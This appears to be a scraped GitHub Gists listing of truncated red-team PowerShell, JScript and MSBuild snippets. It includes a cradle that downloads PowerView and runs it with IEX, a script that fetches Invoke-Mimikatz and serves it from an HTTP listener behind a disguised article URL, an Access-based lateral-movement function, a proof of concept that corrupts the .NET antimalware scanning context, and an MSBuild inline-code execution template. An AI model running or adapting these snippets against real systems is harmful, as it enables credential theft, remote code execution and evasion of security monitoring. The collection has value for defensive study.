This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Start-DotNetEventCollection | |
{ | |
Param( | |
[Parameter(Position = 0)] | |
[Alias('PSPath')] | |
[String] $TracePath = './dotNetTrace.etl', | |
[Parameter(Position = 1)] | |
[String] $TraceName = 'dotNetTrace' | |
) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Add-Type -AssemblyName System.Security | |
$Content = (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1') | |
$Bytes = ([Text.Encoding]::ASCII).GetBytes($Content) | |
$EncryptedBytes = [Security.Cryptography.ProtectedData]::Protect($Bytes, $Null, [Security.Cryptography.DataProtectionScope]::LocalMachine) | |
IEX (([Text.Encoding]::ASCII).GetString([Security.Cryptography.ProtectedData]::Unprotect($EncryptedBytes, $Null, [Security.Cryptography.DataProtectionScope]::LocalMachine))) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$mk = (new-object net.webclient).downloadstring("https://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration/Invoke-Mimikatz.ps1") | |
$Hso = New-Object Net.HttpListener | |
$Hso.Prefixes.Add("http://+:8080/") | |
$Hso.Start() | |
While ($Hso.IsListening) { | |
$HC = $Hso.GetContext() | |
$HRes = $HC.Response | |
$HRes.Headers.Add("Content-Type","text/plain") | |
If (($HC.Request).RawUrl -eq '/home/news/a/21/article.html') { | |
$Buf = [Text.Encoding]::UTF8.GetBytes($mk) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var actCtx = new ActiveXObject( "Microsoft.Windows.ActCtx" ); | |
actCtx.Manifest = "C:\\Tools\\COM\\dynwrap.test.manifest"; | |
try | |
{ | |
var DX = actCtx.CreateObject("DynamicWrapperX"); | |
DX.Register("user32.dll", "MessageBoxW", "i=hwwu", "r=l"); // Register a dll function. | |
res = DX.MessageBoxW(0, "Hello, world!", "Test", 4); // Call the function. | |
} | |
catch(e){ WScript.Echo("Fail");} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
name: NetFrameWork.Legacy.CI | |
on: [push] | |
jobs: | |
build: | |
runs-on: windows-latest | |
steps: | |
- uses: actions/checkout@v1 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<# | |
Lateral Movement Via MSACCESS TransformXML | |
Author: Philip Tsukerman (@PhilipTsukerman) | |
License: BSD 3-Clause | |
Required Dependencies: None | |
Optional Dependencies: None | |
#> | |
function Invoke-AccessXSLT { | |
<# |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$assemblies=( | |
"System" | |
) | |
$source=@" | |
using System; | |
using Microsoft.Win32; | |
using System.Diagnostics; | |
namespace Helloworld |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Subvert-CLRAntiMalware { | |
<# | |
.SYNOPSIS | |
A proof-of-concept demonstrating overwriting a global variable that stores a pointer to an antimalware scan interface context structure. This PoC was only built to work with .NET Framework Early Access build 3694. | |
.DESCRIPTION | |
clr.dll in .NET Framework Early Access build 3694 has a global variable that stores a pointer to an antimalware scan interface context structure. By reading the pointer at that offset and then overwriting the forst DWORD, the context structure will become corrupted and subsequent scanning calls will fail open. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
<!-- This inline task executes c# code. --> | |
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe powaShell.csproj --> | |
<Target Name="Hello"> | |
<ClassExample /> | |
</Target> | |
<UsingTask | |
TaskName="ClassExample" | |
TaskFactory="CodeTaskFactory" | |
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" > |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
logman --% start dotNetTrace -p Microsoft-Windows-DotNETRuntime (JitKeyword,NGenKeyword,InteropKeyword,LoaderKeyword) win:Informational -o dotNetTrace.etl -ets | |
# Do your evil .NET thing now. In this example, I executed the Microsoft.Workflow.Compiler.exe bypass | |
# logman stop dotNetTrace -ets | |
# This is the process ID of the process I want to capture. In this case, Microsoft.Workflow.Compiler.exe | |
# I got the process ID by running a procmon trace | |
$TargetProcessId = 8256 |
OlderNewer